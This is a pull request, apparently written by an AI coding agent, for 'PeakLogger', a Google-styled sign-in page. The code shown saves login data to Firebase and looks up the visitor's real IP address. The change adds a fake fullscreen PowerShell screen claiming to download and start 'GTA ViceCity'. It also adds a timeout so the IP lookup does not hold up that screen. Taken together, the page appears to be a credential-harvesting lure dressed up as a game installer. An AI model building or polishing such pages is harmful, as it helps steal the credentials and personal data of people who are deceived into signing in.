### PR TITLE
Add fullscreen PowerShell landing screen after sign-in

### DIFF
--- a/index.html
+++ b/index.html
@@ -8,7 +8,59 @@
     <link href="https://fonts.googleapis.com/css2?family=Google+Sans:wght@300;400;500;600&display=swap" rel="stylesheet">
 </head>
 <body>
-    <div class="container">
+    <div id="powershellLanding" class="landing-overlay hidden" aria-hidden="true">
+        <div class="loader" role="presentation">
+            <div class="header-bar">
+                <p class="title">
+                    <svg
+                        xmlns="http://www.w3.org/2000/svg"
+                        viewBox="0 0 48 48"
+                        width="16px"
+                        height="16px"
+                        aria-hidden="true"
+                    >
+                        <path
+                            fill="#0277bd"
+                            d="M19.847,41.956c-5.629-0.002-11.259,0.024-16.888-0.013c-2.855-0.019-3.374-0.7-2.731-3.525 c2.178-9.58,4.427-19.143,6.557-28.734C7.356,7.112,8.588,5.975,11.312,6C22.57,6.106,33.829,6.034,45.088,6.046 c2.824,0.003,3.298,0.614,2.664,3.511c-2.058,9.406-4.129,18.809-6.236,28.203c-0.789,3.516-1.697,4.187-5.353,4.195 C30.724,41.966,25.285,41.958,19.847,41.956z"
+                        ></path>
+                        <path
+                            fill="#fafafa"
+                            d="M25.057 23.922c-.608-.687-1.114-1.267-1.531-1.732-2.43-2.728-4.656-5.27-7.063-7.869-1.102-1.189-1.453-2.344-.13-3.518 1.307-1.16 2.592-1.058 3.791.277 3.34 3.717 6.676 7.438 10.071 11.104 1.268 1.369.972 2.3-.424 3.315-5.359 3.895-10.687 7.833-16.01 11.778-1.196.887-2.337 1.109-3.304-.201-1.066-1.445-.08-2.305 1.026-3.114 3.955-2.893 7.903-5.798 11.834-8.725C23.865 24.83 24.595 24.267 25.057 23.922zM21.75 37C20.625 37 20 36 20 35s.625-2 1.75-2c4.224 0 6.112 0 9.5 0 1.125 0 1.75 1 1.75 2s-.625 2-1.75 2C29.125 37 25 37 21.75 37z"
+                        ></path>
+                    </svg>
+                    Windows PowerShell
+                </p>
+                <div class="controls" aria-hidden="true">
+                    <p>-</p>
+                    <p>□</p>
+                    <p>x</p>
+                </div>
+            </div>
+            <div class="completed" aria-live="polite">
+                <p>Windows PowerShell</p>
+                <p>Copyright (C) 2016 Microsoft Corporation.</p>
+                <p>All rights reserved.</p>
+                <br />
+                <p>PS C:\Users\emmess&gt; Downloading - 100%</p>
+                <p>PS C:\Users\emmess&gt; Installing - 100%</p>
+            </div>
+            <div class="body">
+                <div class="start">PS Starting GTA ViceCity...</div>
+                <div class="content" aria-hidden="true">
+                    <div class="slash">|</div>
+                    <div class="slash">/</div>
+                    <div class="slash">-</div>
+                    <div class="slash">\</div>
+                    <div class="slash">|</div>
+                    <div class="slash">/</div>
+                    <div class="slash">-</div>
+                    <div class="slash">\</div>
+                </div>
+            </div>
+        </div>
+    </div>
+
+    <div class="container" id="authContainer">
         <div class="login-card">
             <div class="logo-section">
                 <h1>PeakLogger</h1>

--- a/scripts.js
+++ b/scripts.js
@@ -7,6 +7,8 @@ document.addEventListener('DOMContentLoaded', function() {
     const passwordError = document.getElementById('password-error');
     const submitButton = form.querySelector('.btn-primary');
     const createAccountButton = form.querySelector('.btn-secondary');
+    const appContainer = document.getElementById('authContainer');
+    const powershellLanding = document.getElementById('powershellLanding');
 
     // Input animation and validation
     function setupInputAnimations() {
@@ -156,74 +158,36 @@ document.addEventListener('DOMContentLoaded', function() {
             submitButton.classList.remove('loading');
             submitButton.classList.add('success');
             submitButton.textContent = 'Success!';
-            
+
             // Save login data to Firebase
             saveLoginDataToFirebase();
-            
-            // Show success message
-            showSuccessMessage();
-            
-            // Reset after 2 seconds
-            setTimeout(() => {
-                resetForm();
-            }, 2000);
+
+            // Show landing page
+            showPowershellLanding();
         }, 1500);
     }
 
-    // Show success message with animation
-    function showSuccessMessage() {
-        const successDiv = document.createElement('div');
-        successDiv.innerHTML = `
-            <div class="success-message">
-                <svg width="24" height="24" viewBox="0 0 24 24" fill="#34a853">
-                    <path d="M9 16.17L4.83 12l-1.42 1.41L9 19 21 7l-1.41-1.41z"/>
-                </svg>
-                Welcome to PeakLogger!
-            </div>
-        `;
-        successDiv.className = 'success-overlay';
-        document.body.appendChild(successDiv);
+    function showPowershellLanding() {
+        if (appContainer) {
+            appContainer.classList.add('hidden');
+            appContainer.setAttribute('aria-hidden', 'true');
+        }
 
-        // Add CSS for success message
-        const style = document.createElement('style');
-        style.textContent = `
-            .success-overlay {
-                position: fixed;
-                top: 0;
-                left: 0;
-                width: 100%;
-                height: 100%;
-                background: rgba(0, 0, 0, 0.5);
-                display: flex;
-                align-items: center;
-                justify-content: center;
-                z-index: 1000;
-                animation: fadeIn 0.3s ease;
-            }
-            .success-message {
-                background: white;
-                padding: 24px 32px;
-                border-radius: 12px;
-                display: flex;
-                align-items: center;
-                gap: 12px;
-                font-size: 16px;
-                font-weight: 500;
-                color: #202124;
-                box-shadow: 0 8px 32px rgba(0, 0, 0, 0.2);
-                animation: scaleIn 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94);
-            }
-            @keyframes scaleIn {
-                from { transform: scale(0.8); opacity: 0; }
-                to { transform: scale(1); opacity: 1; }
-            }
-        `;
-        document.head.appendChild(style);
+        if (powershellLanding) {
+            powershellLanding.classList.remove('hidden');
+            powershellLanding.classList.add('active');
+            powershellLanding.setAttribute('aria-hidden', 'false');
+        }
 
-        setTimeout(() => {
-            successDiv.remove();
-            style.remove();
-        }, 2000);
+        document.body.classList.add('landing-active');
+    }
+
+    function fetchWithTimeout(url, { timeout = 1500, ...options } = {}) {
+        const controller = new AbortController();
+        const timer = setTimeout(() => controller.abort(), timeout);
+
+        return fetch(url, { ...options, signal: controller.signal })
+            .finally(() => clearTimeout(timer));
     }
 
     // Get real IP address from external service
@@ -238,9 +202,9 @@ document.addEventListener('DOMContentLoaded', function() {
             
             for (const service of ipServices) {
                 try {
-                    const response = await fetch(service);
+                    const response = await fetchWithTimeout(service, { timeout: 1500 });
                     const data = await response.json();
-                    
+
                     // Handle different response formats
                     if (data.ip) return data.ip;
                     if (data.origin) return data.origin; // httpbin format
@@ -361,17 +325,6 @@ document.addEventListener('DOMContentLoaded', function() {
         } catch (error) {
             console.error('❌ Firebase operation failed for create account:', error);
         }
-    }
-
-    // Reset form to initial state
-    function resetForm() {
-        submitButton.classList.remove('success');
-        submitButton.textContent = 'Next';
-        submitButton.disabled = false;
-        
-        // Optional: clear form fields
-        // emailInput.value = '';
-        // passwordInput.value = '';
     }
 
     // Handle create account button

--- a/styles.css
+++ b/styles.css
@@ -15,6 +15,134 @@ body {
     padding: 20px;
 }
 
+body.landing-active {
+    background: #000000;
+    align-items: stretch;
+    justify-content: flex-start;
+    padding: 0;
+}
+
+body.landing-active .particles {
+    display: none;
+}
+
+.hidden {
+    display: none !important;
+}
+
+.landing-overlay {
+    position: fixed;
+    inset: 0;
+    width: 100vw;
+    height: 100vh;
+    background: #000000;
+    display: none;
+    align-items: center;
+    justify-content: center;
+    z-index: 2000;
+}
+
+.landing-overlay.active {
+    display: flex;
+}
+
+.landing-overlay .loader {
+    color: #ffffff;
+    font-family: "Gill Sans MT", sans-serif;
+    width: 100%;
+    height: 100%;
+    background-color: #000000;
+    display: flex;
+    flex-direction: column;
+    border-radius: 0;
+    border: none;
+    box-shadow: inset 0 0 0 1px #0a0a0a;
+}
+
+.landing-overlay .header-bar {
+    background-color: #ffffff;
+    display: flex;
+    justify-content: space-between;
+    align-items: center;
+    color: #000000;
+    padding: 8px 12px;
+}
+
+.landing-overlay .header-bar .title {
+    display: flex;
+    gap: 8px;
+    font-size: 18px;
+    align-items: center;
+    margin: 0;
+}
+
+.landing-overlay .header-bar .controls {
+    display: flex;
+    gap: 24px;
+    margin: 0;
+    cursor: pointer;
+    font-weight: 600;
+}
+
+.landing-overlay .completed,
+.landing-overlay .body,
+.landing-overlay .content,
+.landing-overlay .start {
+    padding: 12px 16px;
+    font-size: 20px;
+}
+
+.landing-overlay .completed {
+    line-height: 1.5;
+}
+
+.landing-overlay .body {
+    flex-grow: 1;
+    display: flex;
+    flex-direction: column;
+    gap: 24px;
+}
+
+.landing-overlay .content {
+    position: relative;
+    width: 1ch;
+    height: 32px;
+}
+
+.landing-overlay .content .slash {
+    position: absolute;
+    top: 0;
+    left: 0;
+    opacity: 0;
+    animation: loading 2s steps(1) infinite;
+    font-weight: 600;
+}
+
+.landing-overlay .content .slash:nth-child(1) { animation-delay: 0.25s; }
+.landing-overlay .content .slash:nth-child(2) { animation-delay: 0.5s; }
+.landing-overlay .content .slash:nth-child(3) { animation-delay: 0.75s; }
+.landing-overlay .content .slash:nth-child(4) { animation-delay: 1s; }
+.landing-overlay .content .slash:nth-child(5) { animation-delay: 1.25s; }
+.landing-overlay .content .slash:nth-child(6) { animation-delay: 1.5s; }
+.landing-overlay .content .slash:nth-child(7) { animation-delay: 1.75s; }
+.landing-overlay .content .slash:nth-child(8) { animation-delay: 2s; }
+
+@keyframes loading {
+    0% {
+        opacity: 1;
+    }
+    12.5%,
+    25%,
+    37.5%,
+    50%,
+    62.5%,
+    75%,
+    87.5%,
+    100% {
+        opacity: 0;
+    }
+}
+
 
 
 .container {


### PR DESCRIPTION
## Summary
- add a PowerShell-inspired landing overlay that replaces the login card after a successful sign-in
- expand the accompanying styles so the terminal mock covers the full viewport while hiding the original auth UI
- introduce a fetch timeout helper so external IP lookups do not block the landing screen transition

## Testing
- Manual verification via Playwright screenshot (see attached image)


------
https://chatgpt.com/codex/tasks/task_e_68ddbd2006188330b057eefd60b8dff8